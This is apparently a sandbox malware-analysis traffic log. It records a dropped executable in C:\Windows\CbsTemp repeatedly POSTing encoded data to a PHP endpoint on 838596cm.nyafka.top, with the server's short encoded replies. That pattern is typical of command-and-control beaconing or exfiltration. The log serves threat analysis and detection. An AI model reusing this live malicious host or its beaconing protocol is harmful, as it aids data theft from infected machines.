                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:41.049567938 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2528
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:41.395169973 CET2528OUTData Raw: 50 57 5e 51 5c 5d 53 5f 5e 5f 57 54 56 5e 59 5d 57 50 58 5c 50 5e 56 5f 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PW^Q\]S_^_WTV^Y]WPX\P^V_[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#*(Y'#?-=/?.9Z*8=]3(:Q?((?#"-9/#_&'P-
                                                                                                          Jan 8, 2025 17:13:41.511847973 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:41.763473034 CET807INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:41 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qd4Cd7P78uiTNqGz96fTdFJWhVhl6UByBmuTsUZzbZl5qtiKibeW5ce9qxPj%2FDZgm%2Bnpgufi0o92DWjO35LBIOYc%2BtT%2Flv75v2zkQreebyDJvGAhPB2jA7Y0dLUrS0H7Z4IhvqXx"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed79ee2f050f5b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2908&min_rtt=1594&rtt_var=3227&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2877&delivery_rate=120551&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          56192.168.2.550039104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:41.906088114 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:42.254654884 CET2532OUTData Raw: 50 50 5b 54 59 5d 56 5d 5e 5f 57 54 56 5f 59 52 57 51 58 59 50 54 56 5e 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PP[TY]V]^_WTV_YRWQXYPTV^[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ <0$#==/'4>.%Z*;%3+*?0(/<!=#_-#_&'P-#
                                                                                                          Jan 8, 2025 17:13:42.355143070 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:42.676043987 CET807INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:42 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AXX5dnQHx1%2BnHQXX3QxqGS9Ea6vw8%2FGfdJFana%2BmiycEIc16qTVlU5bLcze8hGtvrGPlc5JtUvGmMyvaS0Fn3VlBdmRoUf7FbHd2ofqFbVLqQku3FnB8ZFYosaKllD0ZAH0H%2FP1X"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed79f36a76c34f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8504&min_rtt=1785&rtt_var=14108&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=26286&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          57192.168.2.550040104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:42.807399035 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:43.161109924 CET2532OUTData Raw: 50 52 5b 52 5c 5c 56 5b 5e 5f 57 54 56 56 59 53 57 52 58 5e 50 58 56 5b 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PR[R\\V[^_WTVVYSWRX^PXV[[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ X(83'>>>%X,B?[====']1<10=/8!='9?#_&'P-
                                                                                                          Jan 8, 2025 17:13:43.281111956 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:43.441318989 CET806INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:43 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qpDb1FobZAdIOnEQ1GAVT%2FyCuW1osLlW3YFI4TKRdp6kv4cMiu%2B7X%2B0t2msC%2FHth3QETQsNrzRpgodnotXeAZTv3ZB8Rx6Pb6UhSrgyDuwzLY2gkIX3JTWLZeoRCYyZ1uivJ9D4C"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed79f93a5743b3-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4065&min_rtt=1645&rtt_var=5458&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=69494&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          58192.168.2.550041104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:43.580101967 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          59192.168.2.550042104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:43.901947975 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 1816
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:44.254393101 CET1816OUTData Raw: 55 53 5b 50 59 59 56 59 5e 5f 57 54 56 5e 59 59 57 57 58 5b 50 54 56 5d 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: US[PYYVY^_WTV^YYWWX[PTV][EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ ^< %#>[=![8$$)%Z=8*']-<0*<(Y5>',?#_&'P-+
                                                                                                          Jan 8, 2025 17:13:44.579574108 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:44.806180000 CET956INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:44 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3hxmUwxJTB%2Fdl2wd8MeYiT1mXAzvhdHM4OgXstlyMjwkwhcuuqBEbtK0pBwFd0VFC%2FKIUBXjVV69VeBWKgbfa8qdUElCGZc%2FHbNmfbkCJjeMjDWykHivrRRahdpmBtOljPd66vYi"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7a01387543b3-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=88299&min_rtt=66898&rtt_var=40373&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2165&delivery_rate=21824&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 39 38 0d 0a 03 1d 27 0f 27 03 23 00 22 3b 3e 09 28 39 23 5b 2a 0a 2d 03 2e 29 24 59 26 24 30 5c 26 2c 2b 03 20 06 25 13 3f 38 31 12 33 08 30 57 3c 3b 20 5c 04 1f 24 5e 2b 38 0f 57 29 3f 26 5d 33 33 25 59 25 1d 28 1e 26 03 20 04 27 29 03 0c 20 17 30 0f 3b 0a 3d 0e 3a 06 33 04 2b 09 30 5b 24 2e 2f 50 0f 10 3b 0c 3a 3a 38 03 21 57 3e 53 35 23 23 58 23 1b 3c 10 3f 3d 28 09 35 01 3e 05 33 33 1c 0a 34 21 20 0f 33 0d 05 5b 3e 22 37 0b 3c 19 24 55 2c 02 2c 49 02 3f 58 52 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 98''#";>(9#[*-.)$Y&$0\&,+ %?8130W<; \$^+8W)?&]33%Y%(& ') 0;=:3+0[$./P;::8!W>S5##X#<?=(5>334! 3[>"7<$U,,I?XR0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          60192.168.2.550043104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:44.062858105 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:44.410681009 CET2532OUTData Raw: 55 52 5b 52 59 58 56 5d 5e 5f 57 54 56 5a 59 58 57 55 58 5f 50 58 56 5e 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UR[RYXV]^_WTVZYXWUX_PXV^[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#(03***,4?]?=9=(!\&+P(23\=#"'.#_&'P-7
                                                                                                          Jan 8, 2025 17:13:44.671133041 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:44.914907932 CET807INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:44 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pn0IzmfbjZlCbAhFHqd6dvtoEk4JQt0kc3fWDq06ydvP9i%2FQcemMgWSL5BF04vr3cpkHJFOjjDsK1Ja7kqz2zuabdxQfpTE6AwZe%2BdfalybbekX2qJpPZ9R9CiSDqjW%2FXDqc1isg"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7a01ebfec34f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=17016&min_rtt=11748&rtt_var=14943&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=27088&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          61192.168.2.550044104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:45.070105076 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:13:45.427131891 CET2532OUTData Raw: 55 54 5e 55 59 59 56 5e 5e 5f 57 54 56 5b 59 53 57 5e 58 5d 50 5a 56 5d 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UT^UYYV^^_WTV[YSW^X]PZV][EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ +;(03:Z>[);7/[)=;*0;-(!;]>?(6[']-?#_&'P-3
                                                                                                          Jan 8, 2025 17:13:45.546869993 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:45.783973932 CET798INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:45 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pFOYay97koE34QxBspn9ENNQgkTT7Wfyai36IDII4bEIMXh57GhCn7KvL4JHnSEUtSNeCV8gDccUDxi4FGlxAK7EVAYCXMLhXWdlIdCYPlKx48FsyGmdypJbCvEgMkXQI6LC8v90"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7a076c3c0f5b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3937&min_rtt=1599&rtt_var=5277&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2857&delivery_rate=71889&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          62192.168.2.550045104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:46.199260950 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:46.551325083 CET2532OUTData Raw: 55 57 5b 55 59 50 56 58 5e 5f 57 54 56 5c 59 5a 57 56 58 52 50 5d 56 5b 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UW[UYPVX^_WTV\YZWVXRP]V[[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#+8%3!*/4*6>%\0)<"8*4[ =$.#_&'P-/
                                                                                                          Jan 8, 2025 17:13:46.685350895 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:46.851871967 CET806INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:46 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7jRYQp4s8eNUcCTej8Dkgy40EEv3m1YgOV9QrhOvm%2BB2PwFiQNbnT4KjC59iK3X7r%2FeoosrhNte%2FGxa3KY53Mxc7b5Obq27stg27ZsaHXAhpA5AinSm3GGkTAdwrs9mYOCdfbwGZ"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7a0e789c729f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12371&min_rtt=7844&rtt_var=11996&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=33134&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          63192.168.2.550046104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:46.987838030 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:47.332536936 CET2532OUTData Raw: 55 5d 5e 51 5c 5f 53 5f 5e 5f 57 54 56 5f 59 53 57 57 58 52 50 58 56 58 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: U]^Q\_S_^_WTV_YSWWXRPXVX[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ +]%0.)=\/7Z*.5>5$(>R?1 *(!$./#_&'P-#
                                                                                                          Jan 8, 2025 17:13:47.653321028 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:47.653419018 CET804INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:47 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DXyJx2wbYlIxEd94htbT5S5brBC%2Fc1yilrTj7NE%2BdlI8EZTAnpHbEal17s7bu0%2FbWhp2I6j24YQHfWHq25uBsb8tIotg6DWMkvhAkLavqvDLj2R7rLomjrkh9yJ5QKF3vZbMMZo2"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7a13881c729f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3906&min_rtt=2008&rtt_var=4549&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=84923&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          64192.168.2.550047104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:47.788569927 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:48.146728992 CET2532OUTData Raw: 55 50 5b 52 59 5c 56 5d 5e 5f 57 54 56 5b 59 5f 57 50 58 52 50 5e 56 59 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UP[RY\V]^_WTV[Y_WPXRP^VY[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ ++X'9)),$,=.9\)]"08=(";)!>?-/#_&'P-3
                                                                                                          Jan 8, 2025 17:13:48.231604099 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:48.475284100 CET803INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:48 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
